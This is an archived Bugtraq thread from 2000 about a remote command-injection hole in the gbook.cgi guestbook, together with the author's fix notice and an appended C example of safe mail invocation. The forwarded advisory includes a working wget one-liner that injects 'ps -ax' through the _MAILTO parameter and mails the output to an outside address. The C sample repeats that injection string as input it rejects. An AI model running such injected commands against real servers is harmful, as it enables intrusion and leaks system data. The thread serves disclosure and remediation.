Bugtraq mailing list archives
Re: [hacksware] gbook.cgi remote command execution vulnerability [FIXED]
From: William Kendrick <nbs () SONIC NET>
Date: Sat, 11 Nov 2000 19:00:58 -0800
So far as I can tell, it's fixed... Please let me know if anyone sees
any other glaring holes. It IS rather ancient software.

-bill!

Forwarded message:

From mbrennen () fni com Sat Nov 11 10:28:17 2000
X-envelope-info: <mbrennen () fni com>
Date: Sat, 11 Nov 2000 12:30:28 -0600 (CST)
From: Michael Brennen <mbrennen () fni com>
To: William Kendrick <nbs () sonic net>
Cc: mat () hacksware com
Subject: Re: [hacksware] gbook.cgi remote command execution vulnerability (fwd)
In-Reply-To: <200011110920.eAB9KVL11974 () sonic net>
Message-ID: <Pine.LNX.4.21.0011111230000.27066-100000 () henry fni com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

You might want to post this to bugtraq.

-- Michael

On Sat, 11 Nov 2000, William Kendrick wrote:

> Should be fixed, thanks. I wonder why I wasn't informed directly!
> My @zippy.sonoma.edu address _should_ still be getting forwarded to my new addr.
>
> New download available at:
>
> ftp://ftp.sonic.net/pub/users/nbs/unix/www/gbook/gbook.tar.gz
>
> Modification date: November 11, 2000.
>
> -bill!
>
> > Don't know if you saw this or not; you probably have by now. There are
> > a couple of vulnerable sprintf() also that should be replaced by snprintf().
> >
> > -- Michael
> >
> > ---------- Forwarded message ----------
> > Date: Fri, 10 Nov 2000 20:38:44 +0900
> > From: JW Oh <mat () IVNTECH COM>
> > To: BUGTRAQ () SECURITYFOCUS COM
> > Subject: [hacksware] gbook.cgi remote command execution vulnerability
> >
> > Bug Report
> >
> > 1. Name: gbook.cgi remote command execution vulnerability
> > 2. Release Date: 2000.11.10
> > 3. Affected Application: GBook - A web site guestbook
> >    By Bill Kendrick
> >    kendrick () zippy sonoma edu
> >    http://zippy.sonoma.edu/kendrick/
> > 4. Author: mat () hacksware com
> > 5. Type: Input validation Error
> > 6. Explanation
> >    gbook.cgi is used by some web sites. We can set _MAILTO parameter,
> >    and popen is called to execute mail command. If ';' is used in
> >    _MAILTO variable, you can execute arbitrary command with it.
> >    It's so trivial. :)
> > 7. Exploits
> >    This exploit executes "ps -ax" command and sends the result to haha () yaho com.
> >
> > wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%20haha () yaho com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe () yaho com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"
> >
> > =================================================
> > | mat () hacksware com                          |
> > | http://hacksware.com                          |
> > =================================================
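
The fix pattern for the popen() issue described in the report, as an added example (not code from gbook or from anyone in this thread): the recipient is checked against an allow-list and handed to the mailer as a single argv element, with no shell in between. The function names and the mailer path parameter are assumptions made for illustration.

```c
#include <ctype.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list: [A-Za-z0-9._+-] around exactly one '@'. Shell metacharacters
 * (; | & ` $ space quotes) and a leading '-' (option injection) are rejected. */
int mailto_is_safe(const char *s)
{
    size_t n = strlen(s), at = 0;
    if (n == 0 || n > 254 || s[0] == '-' || s[0] == '@' || s[n - 1] == '@')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '@') at++;
        else if (!isalnum(c) && !strchr("._+-", c)) return 0;
    }
    return at == 1;
}

/* Pipe body to `mailer rcpt` without popen(): rcpt is one argv element and is
 * never parsed as a command line. Returns the mailer's exit status, or -1. */
int send_mail(const char *mailer, const char *rcpt, const char *body)
{
    int fd[2], status;
    if (!mailto_is_safe(rcpt) || pipe(fd) != 0) return -1;
    signal(SIGPIPE, SIG_IGN);          /* a dead mailer must not kill the CGI */
    pid_t pid = fork();
    if (pid < 0) { close(fd[0]); close(fd[1]); return -1; }
    if (pid == 0) {                    /* child: stdin <- pipe, then exec */
        dup2(fd[0], STDIN_FILENO);
        close(fd[0]); close(fd[1]);
        execl(mailer, mailer, rcpt, (char *)NULL);
        _exit(127);                    /* exec failed */
    }
    close(fd[0]);
    ssize_t w = write(fd[1], body, strlen(body));
    close(fd[1]);
    if (waitpid(pid, &status, 0) < 0 || w < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    const char *samples[] = { "webmaster@example.org", "oops;ps -ax|mail x@example.org" }; /* constructed */
    for (int i = 0; i < 2; i++)
        printf("%-32s -> %s\n", samples[i], mailto_is_safe(samples[i]) ? "accept" : "reject");
}
```

The allow-list is deliberately narrower than the full address grammar; it is defence in depth on top of the argv-based exec, which is what removes the shell from the path.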